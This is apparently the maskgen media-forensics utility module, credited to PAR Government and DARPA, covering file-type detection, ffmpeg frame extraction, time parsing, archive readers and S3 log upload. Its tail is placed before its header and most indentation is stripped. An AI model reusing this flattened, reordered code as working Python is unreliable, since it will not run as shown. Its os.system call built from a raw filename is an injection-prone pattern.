(mask[y:y + h, x:x + w] / 255)
return image_to_cover
def selfVideoTest():
logging.getLogger('maskgen').info('Checking opencv and ffmpeg, this may take a minute.')
writer = GrayBlockWriter('test_ts_gw', 29.97002997)
mask_set = list()
for i in range(255):
mask = np.random.randint(255, size=(1090, 1920)).astype('uint8')
mask_set.append(mask)
        writer.write(mask, (i + 1) * 33.3666666667, i + 1)
writer.close()
fn = writer.get_file_name()
vidfn = convertToVideo(fn)
if not os.path.exists(vidfn):
return 'Video Writing Failed'
try:
size = openImage(vidfn, getMilliSecondsAndFrameCount('00:00:01')).size
if size != (1920, 1090):
return 'Video Writing Failed: Frame Size inconsistent'
except:
return 'Video Writing Failed'
return None
def dateTimeStampCompare(v1, v2):
def get_defaults(source):
exifdata = maskgen.exif.getexif(source)
rd = {}
for e in exifdata:
if "date" in str(e).lower() or "time" in str(e).lower():
rd[e] = exifdata[e]
return rd
#date_time_stamp = exifdata['Create Date'] if 'Create Date' in exifdata else exifdata['File Creation Date/Time']
stamp1 = get_defaults(v1)
rgexdict = {}
for e in stamp1:
st = stamp1[e]
rgexf = "\\A"
for x in st:
if x.isdigit():
rgexf += '[0-9]'
elif x.isalpha():
                rgexf += '[a-zA-Z]*'
else:
rgexf += x
rgexf+= "\\Z"
rgexdict[e] = rgexf
stamp2 = get_defaults(v2)
nonmatches = []
for e in stamp2:
if e in rgexdict:
mo = re.match(rgexdict[e],stamp2[e])
if mo is None:
nonmatches.append(e)
else:
pass
#nonmatches.append(e)
return nonmatches
| # =============================================================================
# Authors: PAR Government
# Organization: DARPA
#
# Copyright (c) 2016 PAR Government
# All rights reserved.
# ==============================================================================
import imghdr
import math
import platform
import re
import sys
import threading
import warnings
from datetime import datetime
from subprocess import Popen, PIPE
from scipy import ndimage
from skimage.measure import compare_ssim
import cv2api
import loghandling
import maskgen.exif
from ffmpeg_api import get_ffprobe_tool, ffmpeg_overlay
from image_wrap import *
from maskgen.support import removeValue, getValue
from maskgen.userinfo import get_username
from maskgen_loader import MaskGenLoader
imagefiletypes = [("jpeg files", "*.jpg"), ("png files", "*.png"), ("tiff files", "*.tiff"), ("tiff files", "*.tif"),
("Raw NEF", "*.nef"), ("ARW Sony", "*.arw"), ("CRW Canon", "*.crw"), ("raw panasonic", "*.raw"),
("Raw 2 Panasonic", "*.rw2"), ("ORF Olympus", "*.orf"), ("MDC Minolta", "*.mdc"),
("PTX Pentax", "*.ptx"),
("PEF Pentax", "*.pef"), ("MRW Minolta", "*.nrw"), ("Adobe", "*.dng"),
("bmp files", "*.bmp"), ("pdf files", "*.pdf"), ('cr2', '*.cr2'), ('raf Fuji', '*.raf'),
("NITF files","*.ntf"),("NITF files","*.nitf"),('JP2','*.jp2'), ('Lytro Raw','*.lfr'),
("High Efficiency Image File Format", "*.heic"), ("High Efficiency Image File Format", "*.heif")]
videofiletypes = [("mpeg files", "*.mp4"), ("mov files", "*.mov"), ('wmv', '*.wmv'), ('m4p', '*.m4p'), ('m4v', '*.m4v'),
('f4v', '*.flv'), ("avi files", "*.avi"), ('asf', '*.asf'), ('mts', '*.mts'), ('3gp', '*.3gp'),
('mxf', '*.mxf')]
audiofiletypes = [("mpeg audio files", "*.m4a"), ("mpeg audio files", "*.m4p"), ("mpeg audio files", "*.mp3"),
("raw audio files", "*.raw"), ("Audio Interchange File", "*.aif"),
("Audio Interchange File", "*.aiff"),
("Standard PC audio files", "*.wav"), ("Windows Media audio files", "*.wma")]
zipfiletypes = [('zip of images','*.zip'),('zip of images','*.gz'),('zip of images','*.tgz')]
textfiletypes = [("CSV file", "*.csv"), ("json file", "*.json"), ("text file", "*.txt"), ("log file","*.log")]
suffixes = [".nef", ".jpg", ".png", ".tiff", ".bmp", ".avi", ".mp4", ".mov", ".wmv", ".ppm", ".pbm", ".mdc",".gif",
".raf", ".ptx", ".pef", ".mrw",".dng", ".zip",".gz", ".cr2",".jp2",
".wav", ".wma", ".m4p", ".mp3", ".m4a", ".raw", ".asf", ".mts",".tif",".arw",".orf",".raw",".rw2",".crw"]
maskfiletypes = [("png files", "*.png"), ("zipped masks", "*.tgz")]
modelfiletypes = [('3D Studio', '*.3ds'), ('Blender', '*.blen'), ('Collada', '*.dae'), ('AutoCAD', '*.dxf'),
('Autodesk Exchange', '*.fbx'), ('geoTIFF', '*.tif'), ('gITF', '*.gITF'), ('Lightwave', '*.lwo'),
('OBJ Files', '*.obj'), ('OFF File', '*.off'), ('PLY Files', '*.ply'), ('PTS Files', '*.pts'),
('PTX Files', '*.ptx'), ('Sculptris', '*.sc1'), ('Pro/ENGINEER', '*.scl'),
('Google Sketchup', '*.skp'), ('STL File', '*.stl'), ('TRI Files', '*.tri'), ('V3D Files', '*.v3d'),
('VRML (WRL Files)', '*.wrl'), ('X3D Files', '*.x3d'), ('X3DV Files', '*.x3dv'),
('SoftImage', '*.xsi'), ('ZBrush', '*.ztl'), ('XYZ Files', '*.xyz')]
class S3ProgessComposite(object):
def __init__(self,progress_monitors = []):
self.progress_monitors = progress_monitors
def __call__(self, bytes_amount):
for pm in self.progress_monitors:
pm(bytes_amount)
class S3ProgressPercentage(object):
def __init__(self, filename, log = None):
self._filename = filename
self._size = float(os.path.getsize(filename))
self._seen_so_far = 0
self._percentage_so_far = 0
self._lock = threading.Lock()
self.log = log if log is not None else logging.getLogger('maskgen').info
def __call__(self, bytes_amount):
# To simplify we'll assume this is hooked up
# to a single filename.
with self._lock:
self._seen_so_far += bytes_amount
percentage = (self._seen_so_far / self._size) * 100
if (percentage - self._percentage_so_far) > 5:
self.log(
"%s %s / %s (%.2f%%)" % (
self._filename, self._seen_so_far, self._size,
percentage))
self._percentage_so_far = percentage
def exportlogsto3(location, last_uploaded):
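    """
    Upload the most recently rolled-over maskgen log file to the 'logs/' folder under the given
    S3 location ('bucket/path'), unless it was already uploaded. Returns the log file name.
    """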
import boto3
loghandling.flush_logging()
logging_file = get_logging_file()
if logging_file is not None and last_uploaded != logging_file:
logging_file_name = os.path.split(logging_file)[1]
s3 = boto3.client('s3', 'us-east-1')
bucket = location.split('/')[0].strip()
directory = location[location.find('/') + 1:].strip()
directory = directory[:-1] if directory.endswith('/') else directory
directory = directory[:directory.rfind('/') + 1:].strip() + "logs/"
try:
s3.upload_file(logging_file, bucket, directory + get_username() + '_' + logging_file_name)
except:
logging.getLogger('maskgen').error("Could not upload prior log file to " + directory)
return logging_file
def fetchbyS3URL(url):
import boto3
location = url[5:] if url.startswith('s3://') else url
parts = location.split('/')
BUCKET = parts[0].strip()
location = location[location.find('/') + 1:].strip()
file = parts[-1]
s3 = boto3.resource('s3')
destination = os.path.join('.', file)
my_bucket = s3.Bucket(BUCKET)
my_bucket.download_file(location, destination)
return destination
def get_icon(name):
places = [] # ['./icons']
places.extend([os.path.join(x, 'icons/' + name) for x in sys.path if ('maskgen' in x or not x.endswith('egg')) and \
os.path.exists(os.path.join(x, 'icons'))])
for place in places:
if os.path.exists(place):
return place
return None
def get_logging_file():
"""
:return: The last roll over log file
"""
newest = None
newest_time = None
filename = 'maskgen.log.'
for item in os.listdir('.'):
if item.startswith(filename):
t = os.stat(item).st_ctime
if newest_time is None or newest_time < t:
newest = item
newest_time = t
return newest
def getImageFileTypes():
prefLoader = MaskGenLoader()
filetypes = prefLoader.get_key('filetypes')
filetypes = [] if filetypes is None else filetypes
types = [tuple(x) for x in filetypes]
tset = set([x[1] for x in types])
for suffix in getFileTypes():
if suffix[1] not in tset:
types.append(suffix)
return types
def getMaskFileTypes():
return maskfiletypes
def getFileTypes():
return imagefiletypes + videofiletypes + audiofiletypes + zipfiletypes
def fileTypeChanged(file_one, file_two):
"""
Return: True if the file types of the two provided files do not match
"""
try:
one_type = fileType(file_one)
two_type = fileType(file_two)
return one_type != two_type
except:
return os.path.splitext(file_one)[1].lower() != os.path.splitext(file_two)[1].lower()
def runCommand(command,outputCollector=None):
p = Popen(command, stdout=PIPE, stderr=PIPE)
stdout, stderr = p.communicate()
errors = []
if p.returncode == 0:
if outputCollector is not None:
for line in stdout.splitlines():
outputCollector.append(line)
if p.returncode != 0:
try:
if stderr is not None:
for line in stderr.splitlines():
if len(line) > 2:
errors.append(line)
except OSError as e:
errors.append(str(e))
return errors
def isVideo(filename):
ffmpegcommand = [get_ffprobe_tool(), filename]
try:
p = Popen(ffmpegcommand, stdout=PIPE, stderr=PIPE)
stdout, stderr = p.communicate()
return stderr.find('Invalid data') < 0
except:
return False
def getMimeType(filename):
import subprocess
import shlex
cmd = shlex.split('file --mime-type "{0}"'.format(filename))
try:
result = subprocess.check_output(cmd)
return (result.split(':')[1]).split('/')[0].strip()
except Exception as e:
logging.getLogger('maskgen').error('Cannot determine file type for "{}": {}'.format(
filename,
str(e)
))
raise ValueError('Cannot determine file type for "{}"'.format(
filename
))
def zipFileType(fileName):
parts = fileName.lower().split('.')
if parts[-1] not in ['zip','gz','tgz']:
return None
return fileType('.'.join(parts[0:-1]))
def fileType(fileName):
if os.path.isdir(fileName):
return 'dir'
lowerName = fileName.lower()
suffixes = lowerName.split('.')
suffix = '*.' + suffixes[-1] if len(suffixes) > 0 else ''
file_type = None
if suffix in ['*.zip', '*.tgz', '*.gz']:
file_type = 'zip'
if len(suffixes) > 2:
content_type = '*.' + suffixes[-2]
if content_type not in [x[1] for x in imagefiletypes]:
file_type = 'collection'
elif suffix in [x[1] for x in imagefiletypes] or (os.path.exists(fileName) and imghdr.what(fileName) is not None):
file_type = 'image'
elif suffix in [x[1] for x in audiofiletypes]:
file_type = 'audio'
elif suffix in [x[1] for x in textfiletypes]:
file_type = 'text'
elif suffix in [x[1] for x in videofiletypes] or isVideo(fileName):
file_type = 'video'
return getMimeType(fileName) if file_type is None else file_type
def getOS():
return platform.system() + ' ' + platform.release() + ' ' + platform.version()
def openFile(fileName):
"""
Open a file using a native OS associated program
"""
import sys
if fileName.endswith('.hdf5'):
fileName = convertToVideo(fileName, preferences=MaskGenLoader())
if sys.platform.startswith('linux'):
os.system('xdg-open "' + fileName + '"')
elif sys.platform.startswith('win'):
os.startfile(fileName)
else:
os.system('open "' + fileName + '"')
class IntObject:
value = 0
def __init__(self):
pass
def set(self, value):
self.value = value
def increment(self):
self.value += 1
return self.value
def imageResize(img, dim):
"""
:param img:
:param dim:
:return:
@rtype: ImageWrapper
"""
return img.resize(dim, Image.ANTIALIAS).convert('RGBA')
def imageResizeRelative(img, dim, otherImDim):
"""
    Preserves the dimension ratios.
:param dim:
:param otherImDim: dimensions of other image
:return: Resized relative to width given the maximum constraints
@rtype: ImageWrapper
"""
if otherImDim is None and img is not None:
otherImDim = img.size
if img is None:
img = ImageWrapper(np.zeros((otherImDim[1], otherImDim[0]), dtype=np.uint8))
wmax = max(img.size[0], otherImDim[0])
hmax = max(img.size[1], otherImDim[1])
wpercent = float(dim[0]) / float(wmax)
hpercent = float(dim[1]) / float(hmax)
perc = min(wpercent, hpercent)
wsize = int((float(img.size[0]) * float(perc)))
hsize = int((float(img.size[1]) * float(perc)))
return img.resize((wsize, hsize), Image.ANTIALIAS)
def validateCoordinates(v):
"""
Coordinates are [x,y] or (x,y) or x,y where x and y are integers.
Return False if the coordinates are invalid.
"""
try:
return len([int(re.sub('[()]', '', x)) for x in v.split(',')]) == 2
except ValueError:
return False
def sumMask(mask):
return int(np.sum(mask))
class VidTimeManager:
"""
frameCountWhenStarted: record the frame at start
frameCountWhenStopped: record the frame at finish
"""
def __init__(self, startTimeandFrame=None, stopTimeandFrame=None):
self.startTimeandFrame = startTimeandFrame
self.stopTimeandFrame = stopTimeandFrame
#if startTimeandFrame is not None and startTimeandFrame[1] > 0 and startTimeandFrame[0] > 0:
# self.startTimeandFrame = (startTimeandFrame[0],startTimeandFrame[1]+1)
#if stopTimeandFrame is not None and stopTimeandFrame[1] > 0 and stopTimeandFrame[0] > 0:
# self.stopTimeandFrame = (stopTimeandFrame[0],stopTimeandFrame[1]+1)
self.pastEndTime = False
self.beforeStartTime = True if startTimeandFrame else False
self.reachedEnd = False
self.milliNow = 0
self.frameCountWhenStopped = 0
self.frameCountWhenStarted = 0
self.frameSinceBeginning = 0
self.frameCountSinceStart = 0
self.frameCountSinceStop = 0
def isAtBeginning(self):
return self.startTimeandFrame is None or (self.startTimeandFrame[0] < 0 and self.startTimeandFrame[1] < 2)
def spansToEnd(self):
return self.stopTimeandFrame is None or (self.stopTimeandFrame[0] is None and self.stopTimeandFrame[1] is None)
def getExpectedStartFrameGiveRate(self, rate, defaultValue=None):
if not self.startTimeandFrame:
return defaultValue
return self.startTimeandFrame[1] + (self.startTimeandFrame[0] / 1000.0) * float(rate)
def getExpectedEndFrameGiveRate(self, rate, defaultValue=None):
if not self.stopTimeandFrame:
return defaultValue
val = int(self.stopTimeandFrame[1] + (self.stopTimeandFrame[0] / 1000.0) * float(rate))
if val == 0:
return defaultValue
return self.stopTimeandFrame[1] + (self.stopTimeandFrame[0] / 1000.0) * float(rate)
def getStartFrame(self):
return self.frameCountWhenStarted if self.startTimeandFrame else 1
def getEndFrame(self):
return self.frameCountWhenStopped if self.stopTimeandFrame and self.frameCountWhenStopped else self.frameSinceBeginning
def updateToNow(self, milliNow, frames=1):
"""
:param milliNow: time after the frame is to be displayed or sound emitted
:param frames:
:return:
"""
self.milliNow = milliNow
self.frameSinceBeginning += frames
if self.stopTimeandFrame:
if self.milliNow > self.stopTimeandFrame[0]:
self.frameCountSinceStop += frames
if self.frameCountSinceStop >= self.stopTimeandFrame[1]:
self.frameCountWhenStopped = self.frameSinceBeginning
self.reachedEnd = True
if not self.pastEndTime and self.frameCountSinceStop > self.stopTimeandFrame[1]:
self.pastEndTime = True
self.frameCountWhenStopped = self.frameSinceBeginning - 1
if self.startTimeandFrame:
if self.milliNow > self.startTimeandFrame[0]:
self.frameCountSinceStart += frames
if self.frameCountSinceStart >= self.startTimeandFrame[1]:
if self.beforeStartTime:
self.frameCountWhenStarted = self.frameSinceBeginning
self.beforeStartTime = False
def setStopFrame(self, frame):
if self.stopTimeandFrame is not None and self.stopTimeandFrame[0] > 0:
self.frameCountSinceStop = self.frameSinceBeginning
self.stopTimeandFrame = (0,frame)
def isOpenEnded(self):
return self.stopTimeandFrame is None
def isEnd(self):
return self.reachedEnd
def isPastTime(self):
return self.pastEndTime
def isPastStartTime(self):
return self.startTimeandFrame and self.milliNow > self.startTimeandFrame[0] and \
self.frameCountSinceStart > self.startTimeandFrame[1]
def isBeforeTime(self):
return self.beforeStartTime
def getFrameDurationString(st, et):
"""
    Calculate the duration (HH:MM:SS) between two time strings.
"""
try:
stdt = datetime.strptime(st, '%H:%M:%S.%f')
except ValueError:
stdt = datetime.strptime(st, '%H:%M:%S')
try:
etdt = datetime.strptime(et, '%H:%M:%S.%f')
except ValueError:
etdt = datetime.strptime(et, '%H:%M:%S')
delta = etdt - stdt
if delta.days < 0:
return None
sec = delta.seconds
sec += (1 if delta.microseconds > 0 else 0)
hr = sec / 3600
mi = sec / 60 - (hr * 60)
ss = sec - (hr * 3600) - mi * 60
return '{:=02d}:{:=02d}:{:=02d}'.format(hr, mi, ss)
def getSecondDurationStringFromMilliseconds(millis):
sec = int(millis / 1000)
ms = int(millis - (sec * 1000))
return '{:=02d}.{:=03d}'.format(sec, ms)
def getDurationStringFromMilliseconds(millis):
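    """
    Convert milliseconds to 'HH:MM:SS.microseconds', e.g. 3723500.0 -> '01:02:03.500000'.
    """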
sec = int(millis / 1000)
ms = int((millis - (sec * 1000)) * 1000.0)
hr = sec / 3600
mi = sec / 60 - (hr * 60)
ss = sec - (hr * 3600) - mi * 60
return '{:=02d}:{:=02d}:{:=02d}.{:=06d}'.format(hr, mi, ss, ms)
def addTwo(num_string):
return int(num_string) + 2
def sutractOne(num_string):
return int(num_string) - 1
def addOneFrame(time_string):
time_val = getMilliSecondsAndFrameCount(time_string, defaultValue=(0,0))
return str(time_val[1] + 1)
def subtractOneFrame(time_string):
time_val = getMilliSecondsAndFrameCount(time_string, defaultValue=(0,1))
return str(time_val[1] - 1) if time_val[1] > 1 else '0'
def addFrame(millisAndFrame, frames):
return millisAndFrame[0], millisAndFrame[1] + frames
def differenceBetweenFrame(mandf1, mandf2, rate):
timediff = mandf1[0] - mandf2[0]
frames = int(timediff*rate/1000.0)
return frames + (mandf1[1] - mandf2[1])
def differenceBetweeMillisecondsAndFrame(mandf1, mandf2, rate):
return mandf1[0] - mandf2[0] + (rate * (mandf1[1] - mandf2[1]))
def differenceInFramesBetweenMillisecondsAndFrame(mandf1, mandf2, rate):
return (mandf1[0] - mandf2[0]) / 1000.0 / rate + mandf1[1] - mandf2[1]
def getMilliSeconds(v):
if v is None:
return None, 0
if type(v) in [int,float]:
return v
dt = None
coloncount = v.count(':')
if coloncount == 0:
return int(float(v) * 1000.0)
try:
if '.' in v and len(v) > 15:
v = v[:15]
dt = datetime.strptime(v, '%H:%M:%S.%f')
except ValueError:
try:
dt = datetime.strptime(v, '%H:%M:%S')
except ValueError:
return None
    millis = dt.hour * 3600000 + dt.minute * 60000 + dt.second * 1000 + dt.microsecond / 1000
return millis
def getMilliSecondsAndFrameCount(v, rate=None, defaultValue=None):
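    """
    Parse a time specification 'HH:MM:SS[.micro][:frame]' (or a bare frame number) into a
    (milliseconds, frame count) tuple, e.g. '00:00:02' -> (2000, 0).
    """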
if v is None:
return defaultValue
if type(v) == int:
return (float(v) / rate * 1000, 0) if rate is not None else (0, 1 if v == 0 else v)
frame_count = 0
coloncount = v.count(':')
if coloncount > 2:
try:
frame_count = int(v[v.rfind(':') + 1:])
v = v[0:v.rfind(':')]
except:
return defaultValue
elif coloncount == 0:
return (float(v) / rate * 1000.0, 0) if rate is not None else (0, 1 if v == 0 else int(v))
try:
if '.' in v and len(v) > 15:
v = v[:15]
dt = datetime.strptime(v, '%H:%M:%S.%f')
except ValueError:
try:
dt = datetime.strptime(v, '%H:%M:%S')
except ValueError:
return defaultValue
    millis = dt.hour * 3600000 + dt.minute * 60000 + dt.second * 1000 + dt.microsecond / 1000
if rate is not None:
millis += float(frame_count) / rate * 1000.0
frame_count = 0
return (millis, frame_count) if (millis, frame_count) != (0, 0) else (0, 1)
def validateTimeString(v):
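    """
    Return True if v is an integer (or digit string) frame number or an 'HH:MM:SS[.micro]' time string.
    """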
if type(v) == int:
return True
if v.count(':') > 2:
return False
if v.count(':') == 0:
try:
int(v)
except:
return False
return True
try:
datetime.strptime(v, '%H:%M:%S.%f')
except ValueError:
try:
datetime.strptime(v, '%H:%M:%S')
except ValueError:
return False
return True
def validateAndConvertTypedValue(argName, argValue, operationDef, skipFileValidation=True):
"""
Validate a typed operation argument
return the type converted argument if necessary
raise a ValueError if invalid
"""
if not argValue or len(str(argValue)) == 0:
raise ValueError(argName + ' cannot be an empty string')
argDef = operationDef.optionalparameters[argName] if argName in operationDef.optionalparameters else None
argDef = operationDef.mandatoryparameters[
argName] if not argDef and argName in operationDef.mandatoryparameters else argDef
if argDef:
if argDef['type'] == 'imagefile':
if not os.path.exists(argValue) and not skipFileValidation:
raise ValueError(argName + ' is an invalid file')
elif argDef['type'].startswith('float'):
typeDef = argDef['type']
vals = [float(x) for x in typeDef[typeDef.rfind('[') + 1:-1].split(':')]
if float(argValue) < vals[0] or float(argValue) > vals[1]:
raise ValueError(argName + ' is not within the defined range')
return float(argValue)
elif argDef['type'].startswith('int'):
typeDef = argDef['type']
_match = re.search(r"\[(.*?)\]", typeDef).group(1)
vals = [int(x) for x in _match.split(':')]
if int(argValue) < vals[0] or int(argValue) > vals[1]:
raise ValueError(argName + ' is not within the defined range')
return int(argValue)
elif argDef['type'] == 'list':
if argValue not in argDef['values']:
raise ValueError(argValue + ' is not one of the allowed values')
elif argDef['type'] in ('frame_or_time', 'time'):
if not validateTimeString(argValue):
raise ValueError(argValue + ' is not a valid time (e.g. HH:MM:SS.micro)')
elif argDef['type'] == 'yesno':
if argValue.lower() not in ['yes', 'no']:
raise ValueError(argName + ' is not yes or no')
elif argDef['type'] == 'coorindates':
if not validateCoordinates(argValue):
                raise ValueError(argName + ' is not a valid coordinate (e.g. (6,4))')
return argValue
def _processFileMeta(stream):
streams = []
if stream is None:
return streams
for line in stream.splitlines():
if line is None or len(line) == 0:
break
if 'Stream' in line:
if 'Audio' in line:
streams.append('audio')
if 'Video' in line:
streams.append('video')
return streams
def getFileMeta(filename):
ffmpegcommand = os.getenv('MASKGEN_FFPROBETOOL', 'ffprobe')
try:
stdout, stderr = Popen([ffmpegcommand, filename], stdout=PIPE, stderr=PIPE).communicate()
if stderr is not None:
meta = _processFileMeta(stderr)
if stdout is not None:
meta.extend(_processFileMeta(stdout))
return meta
except Exception as e:
logging.getLogger('maskgen').error('FFMPEG error (is it installed?): ' + str(e))
return {}
def millisec2time(milliseconds):
''' Convert milliseconds to 'HH:MM:SS.FFF' '''
s, ms = divmod(milliseconds, 1000)
m, s = divmod(s, 60)
h, m = divmod(m, 60)
d, h = divmod(h, 24)
if ms > 0:
pattern = r'%02d:%02d:%02d.%03d'
return pattern % (h, m, s, ms)
else:
pattern = r'%02d:%02d:%02d'
return pattern % (h, m, s)
def outputVideoFrame(filename, outputName=None, videoFrameTime=None, isMask=False):
import os
ffcommand = os.getenv('MASKGEN_FFMPEG', 'ffmpeg')
if outputName is not None:
outfilename = outputName
else:
outfilename = os.path.splitext(filename)[0] + '.png'
command = [ffcommand, '-i', filename]
if videoFrameTime is not None:
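        # approximate seek point in milliseconds: requested time plus ~30 ms per requested frame (assumes ~30 fps content)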
st = videoFrameTime[0] + 30 * videoFrameTime[1]
command.extend(['-ss', millisec2time(st)])
command.extend(['-vframes', '1', outfilename])
try:
p = Popen(command, stdout=PIPE, stderr=PIPE)
p.communicate()
p.wait()
except OSError as e:
logging.getLogger('maskgen').error("FFmpeg not installed")
logging.getLogger('maskgen').error(str(e))
raise e
return openImage(outfilename, isMask=isMask)
class ZipWriter:
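    """
    Write frames as individually numbered PNG files into a zip archive, exposing a small
    cv2.VideoWriter-like interface (write/get/release) plus a meta.csv holding the frame rate.
    """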
def __init__(self, filename, fps=30):
from zipfile import ZipFile
postfix = filename[filename.rfind('.'):]
self.filename = filename + ('.zip' if postfix not in ['.tgz','.zip'] else '')
self.myzip = ZipFile(self.filename, 'w')
self.count = 0
self.fps = fps
self.prefix = os.path.basename(os.path.splitext(self.filename)[0])
#self.names = []
def isOpened(self):
#TODO: check names, what else
return True
def get(self,prop):
if prop == cv2api.cv2api_delegate.prop_fps:
return self.fps
if prop == cv2api.cv2api_delegate.prop_frame_count:
return self.count
if prop == cv2api.cv2api_delegate.prop_pos_msec:
return self.count * self.fps
def write(self, frame):
fname = "{}_{}.png".format(self.prefix, self.count)
ImageWrapper(frame,filename=fname).save(fname)
self.myzip.write(fname,fname)
self.count+=1
os.remove(fname)
def release(self):
fn = 'meta.csv'
with open(fn,'w') as fp:
            fp.write('frame_rate,{}\n'.format(self.fps))
self.myzip.write(fn, fn)
os.remove('meta.csv')
self.myzip.close()
class ZipCapture:
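    """
    Read images back out of a zip archive, exposing a cv2.VideoCapture-like interface
    (grab/retrieve/read/get/release). Frames are extracted to a temporary directory on demand.
    """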
def __init__(self, filename, fps=30, filetypes=imagefiletypes):
from zipfile import ZipFile
import uuid
self.filename = filename
self.myzip = ZipFile(filename, 'r')
file_type_matcher = re.compile('.*\.(' + '|'.join([ft[1][ft[1].rfind('.') + 1:] for ft in filetypes]) + ')')
self.fps = fps
self.count = 0
self.dir = os.path.join(os.path.dirname(os.path.abspath(self.filename)) , uuid.uuid4().__str__())
os.mkdir(self.dir)
if 'meta.csv' in self.myzip.namelist():
self.loadMeta()
self.names = [name for name in self.myzip.namelist() if len(file_type_matcher.findall(name.lower())) > 0 and \
os.path.basename(name) == name]
self.exif = None
def loadMeta(self):
self.meta = {}
if 'meta.csv' in self.myzip.namelist():
fn = self._extract_name('meta.csv')
with open(fn,mode='r') as fp:
for line in fp.readlines():
parts = line.split(',')
self.meta[parts[0].lower().strip()] = ','.join(parts[1:])
self.fps = self.fps if 'frame_rate' not in self.meta else float(self.meta['frame_rate'])
def get_size(self):
return len(self.names)
def isOpened(self):
#TODO: check names, what else
return True
def _extract_name(self,name):
extracted_file = os.path.join(self.dir, name)
if not os.path.exists(extracted_file):
extracted_file = self.myzip.extract(name, self.dir)
return extracted_file
def get(self,prop):
if prop == cv2api.cv2api_delegate.prop_fps:
return self.fps
if prop == cv2api.cv2api_delegate.prop_frame_count:
return self.get_size()
if prop == cv2api.cv2api_delegate.prop_pos_msec:
return self.count* 1000.0/self.fps
exif = self.get_exif()
if prop == cv2api.cv2api_delegate.prop_frame_height:
return getExifDimensionsFromData(exif)[0][0]
if prop == cv2api.cv2api_delegate.prop_frame_width:
return getExifDimensionsFromData(exif)[0][1]
def grab(self):
self.count+=1
return self.count <= len(self.names)
def get_exif(self):
if self.exif is None:
name = self.names[min(len(self.names)-1,max(0, self.count - 1))]
extracted_file = self._extract_name (name)
self.exif = exif.getexif(extracted_file)
return self.exif
def retrieve(self):
if self.count > len(self.names):
return False, None
name = self.names[self.count-1]
extracted_file = self._extract_name (name)
return True, openImage(extracted_file, isMask=False).to_array()
def set_to_end(self):
self.count = len(self.names)
def retrieve_file(self):
if self.count > len(self.names):
return None
name = self.names[self.count-1]
extracted_file = self._extract_name (name)
return extracted_file
def read(self):
self.grab()
return self.retrieve()
def release(self):
import shutil
if self.dir is not None:
shutil.rmtree(self.dir)
self.myzip.close()
self.dir = None
def readFromZip(filename, filetypes=imagefiletypes, videoFrameTime=None, isMask=False, snapshotFileName=None, fps=30):
from zipfile import ZipFile
import re
file_type_matcher = re.compile('.*\.(' + '|'.join([ft[1][ft[1].rfind('.') + 1:] for ft in filetypes]) + ')')
with ZipFile(filename, 'r') as myzip:
names = myzip.namelist()
names.sort()
time_manager = VidTimeManager(stopTimeandFrame=videoFrameTime)
i = 0
for name in names:
i += 1
elapsed_time = i * fps
if len(file_type_matcher.findall(name.lower())) == 0:
continue
time_manager.updateToNow(elapsed_time)
if time_manager.isPastTime() or videoFrameTime is None:
break
extracted_file = myzip.extract(name, os.path.dirname(os.path.abspath(filename)))
img = openImage(extracted_file, isMask=isMask)
if extracted_file != snapshotFileName and snapshotFileName is not None:
img.save(snapshotFileName)
return img
def readFromArchive(filename, filetypes=imagefiletypes, videoFrameTime=None, isMask=False, snapshotFileName=None, fps=30):
import tarfile
import re
file_type_matcher = re.compile('.*\.(' + '|'.join([ft[1][ft[1].rfind('.') + 1:] for ft in filetypes]) + ')')
    archive = tarfile.open(filename, "r:gz")
try:
names = archive.getnames()
names.sort()
time_manager = VidTimeManager(stopTimeandFrame=videoFrameTime)
i = 0
for name in names:
i += 1
elapsed_time = i * fps
if len(file_type_matcher.findall(name.lower())) == 0:
continue
time_manager.updateToNow(elapsed_time)
if time_manager.isPastTime() or videoFrameTime is None:
break
if names:
extracted_file = archive.extract(name, os.path.dirname(os.path.abspath(filename)))
img = openImage(extracted_file, isMask=isMask)
else:
extracted_file =''
img = openImage('')
if extracted_file != snapshotFileName and snapshotFileName is not None:
img.save(snapshotFileName)
return img
finally:
archive.close()
def readImageFromVideo(filename, videoFrameTime=None, isMask=False, snapshotFileName=None):
cap = cv2api.cv2api_delegate.videoCapture(filename, useFFMPEGForTime=False)
bestSoFar = None
bestVariance = -1
maxTry = 20
time_manager = VidTimeManager(stopTimeandFrame=videoFrameTime)
try:
while cap.isOpened():
ret, frame = cap.read()
if not ret:
break
frame = frame[..., ::-1]
elapsed_time = cap.get(cv2api.cv2api_delegate.prop_pos_msec)
time_manager.updateToNow(elapsed_time)
if time_manager.isPastTime():
bestSoFar = frame
break
varianceOfImage = math.sqrt(ndimage.measurements.variance(frame))
if frame is not None and bestVariance < varianceOfImage:
bestSoFar = frame
bestVariance = varianceOfImage
maxTry -= 1
if not videoFrameTime and maxTry <= 0:
break
finally:
cap.release()
if bestSoFar is None:
logging.getLogger('maskgen').error(
"{} cannot be read by OpenCV/ffmpeg. Mask generation will not function properly.".format(filename))
return outputVideoFrame(filename, outputName=snapshotFileName, videoFrameTime=videoFrameTime, isMask=isMask)
else:
img = ImageWrapper(bestSoFar, to_mask=isMask)
if snapshotFileName is not None and snapshotFileName != filename:
img.save(snapshotFileName)
return img
def md5_of_file(filename, raiseError=True, load_size=500000000):
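    """
    Return the MD5 hex digest of the file, streaming in load_size chunks for large files.
    """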
import hashlib
import os
try:
size = os.stat(filename).st_size
with open(filename, 'rb') as rp:
if size < load_size:
return hashlib.md5(rp.read()).hexdigest()
else:
m = hashlib.md5()
while True:
b = rp.read(load_size)
if b is not None and len(b) > 0:
m.update(b)
else:
break
return m.hexdigest()
except Exception as e:
if raiseError:
raise e
return ''
def uniqueId():
import time
return str(time.time()).replace('.', '')
def shortenName(name, postfix, identifier=None):
import hashlib
middle = ''.join([(x[0] + x[-1] if len(x) > 1 else x) for x in name.split('_')])
if identifier is not None:
middle = middle + '_' + str(identifier)
return hashlib.md5(name + postfix).hexdigest() + '_' + middle + '_' + postfix
class ImageOpener:
def __init__(self):
pass
def openImage(self, filename, isMask=False, args=None):
try:
img = openImageFile(filename, isMask=isMask, args=args)
return img if img is not None else openImage(get_icon('RedX.png'))
except Exception as e:
logging.getLogger('maskgen').warning('Failed to load ' + filename + ': ' + str(e))
return openImage(get_icon('RedX.png'))
class AudioOpener(ImageOpener):
def __init__(self):
ImageOpener.__init__(self)
def openImage(self, filename, isMask=False, args=None):
return ImageOpener.openImage(self, get_icon('audio.png'))
class VideoOpener(ImageOpener):
def __init__(self, videoFrameTime=None, preserveSnapshot=True):
self.videoFrameTime = videoFrameTime
self.preserveSnapshot = preserveSnapshot
ImageOpener.__init__(self)
def openSnapshot(self, filename, snapshotFileName):
return os.path.exists(snapshotFileName) and \
os.stat(snapshotFileName).st_mtime >= os.stat(filename).st_mtime
